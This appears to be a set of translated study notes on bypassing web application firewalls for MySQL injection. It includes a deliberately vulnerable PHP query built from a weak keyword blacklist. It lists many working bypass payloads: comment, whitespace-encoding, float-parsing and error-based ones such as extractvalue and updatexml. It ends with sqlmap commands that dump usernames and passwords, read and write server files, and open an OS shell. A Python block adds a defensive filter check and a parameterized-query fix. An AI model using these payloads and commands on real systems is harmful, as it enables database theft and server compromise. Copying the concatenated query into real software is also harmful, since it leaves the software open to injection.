WAF Bypass
Principle
Mastering MySQL functions and syntax + a deep understanding of how the middleware (web server) processes requests + understanding what the WAF protects and how = bypassing WAF protection
Code implementation (partial):
$id = $_GET['id'];
$id = blacklist($id);
// The "filtered" value is still spliced straight into the query text
$sql = "select * from users where id='$id' limit 0,1";
$result = mysql_query($sql);
$row = mysql_fetch_array($result);
function blacklist($id)
{
    // One case-insensitive pass that strips "or" and "and"
    $id = preg_replace('/or/i', '', $id);
    $id = preg_replace('/AND/i', '', $id);
    return $id;
}
1. Code analysis:
The blacklist() function filters out 'or' and 'and'
2. Bypassing the restriction
Case variation: Or, OR, oR; equivalent substitution: and = &&, or = ||; double-writing, etc.
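As an added example (not code from the original notes), the following Python port of the blacklist() above shows the check a defender should run against any strip-style filter, namely whether it reaches a fixed point, beside the hardened form the notes' code lacks: an integer allowlist plus parameter binding. It assumes a constructed in-memory SQLite `users` table standing in for the page's MySQL table.

```python
import re
import sqlite3
from typing import Optional

def make_db() -> sqlite3.Connection:
    """Constructed stand-in for the page's MySQL `users` table (SQLite, in memory)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [(1, "alice"), (2, "bob"), (3, "carol")])
    return conn

def blacklist(value: str) -> str:
    """Port of the page's blacklist(): one case-insensitive pass removing 'or' and 'and'."""
    value = re.sub(r"or", "", value, flags=re.IGNORECASE)
    value = re.sub(r"and", "", value, flags=re.IGNORECASE)
    return value

def filter_is_idempotent(value: str) -> bool:
    """A sanitizer that only deletes substrings must reach a fixed point: applying
    it twice must equal applying it once. Where it does not, the deleted keyword
    re-forms from the surrounding characters (the double-write case in the notes)."""
    once = blacklist(value)
    return blacklist(once) == once

def validate_id(raw_id: str) -> Optional[int]:
    """Allowlist instead of blacklist: `id` is an integer, so accept only decimal digits."""
    return int(raw_id) if re.fullmatch(r"[0-9]{1,10}", raw_id) else None

def safe_lookup(conn: sqlite3.Connection, raw_id: str) -> Optional[tuple]:
    """Hardened form of the page's query: typed input plus parameter binding, so the
    value is never parsed as SQL whatever characters the request carried."""
    user_id = validate_id(raw_id)
    if user_id is None:
        raise ValueError("id must be a positive integer")
    return conn.execute(
        "SELECT id, username FROM users WHERE id = ? LIMIT 1", (user_id,)
    ).fetchone()

if __name__ == "__main__":
    db = make_db()
    print(blacklist("oorr"), filter_is_idempotent("oorr"))  # or False
    print(safe_lookup(db, "3"))                              # (3, 'carol')
```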
Black-box bypass:
1. Architecture-level bypass:
- Find the origin server (against cloud WAFs)
- Use a host on the same network segment to bypass the WAF-protected zone
- Exploit a perimeter vulnerability to bypass the WAF-protected zone
2. Bypassing the WAF via resource limits
- Large POST body
3. Protocol-level bypass
- Protocols not covered by the WAF
(change of request method: GET > POST; HTTP parameter pollution)
4. Rule-level bypass
1. SQL comment bypass
- union /**/select
- union/*aaa%01bbs*/select
- union/*aaaaaaaaaaaaaaaaaaaaaa*/select
- inline comment: /*!xxx*/
2. Whitespace bypass
- MySQL whitespace: %09, %0A, %0B, %0D, %0C, %A0, %20, /*xxx*/
- Regex whitespace: %09, %0A, %0B, %0D, %20
Example 1: union%250Cselect
Example 2: union%25A0select
3. Function-call separators:
- concat%2520(
- concat/**/(
- concat%250c(
- concat%25a0(
4. Floating-point lexical parsing
select * from users where id = 8E0union select 1,2,3,4,5,6,7,8,0
select * from users where id = 8.0 union select 1,2,3,4,5,6,7,8,0
select * from users where id =\N union select 1,2,3,4,5,6,7,8,9,0
5. Error-based SQL injection: the error-based injection functions are very easy to overlook
extractvalue(1,concat(0x5c,md5(3)));
updatexml(1,concat(0x5d,md5(3)),1);
GeometryCollection((select * from(select * from(select@@version)f)x))
polygon((select * from (select name_const(version(),1))x))
linestring()
multipoint()
multilinestring()
multipolygon()
6. MySQL special syntax
- select{x table_name}from{x information_schema.tables};
Taking comment bypass as an example: use Burp Suite (BP) to fuzz the characters inside the comment and obtain a payload
Common sqlmap commands
sqlmap.py -u 'url?id=1'
sqlmap.py -u 'url?id=1' --current-db
sqlmap.py -u 'url?id=1' --current-user
sqlmap.py -u 'url?id=1' -D security --tables
sqlmap.py -u 'url?id=1' -D security -T users --columns
sqlmap.py -u 'url?id=1' -D security -T users -C username,password --dump
sqlmap.py -u 'url?id=1' --os-shell
sqlmap.py -u 'url?id=1' --sql-shell
sqlmap.py -u 'url?id=1' --file-read
sqlmap.py -u 'url?id=1' --file-write <local file> --file-dest <target directory and file>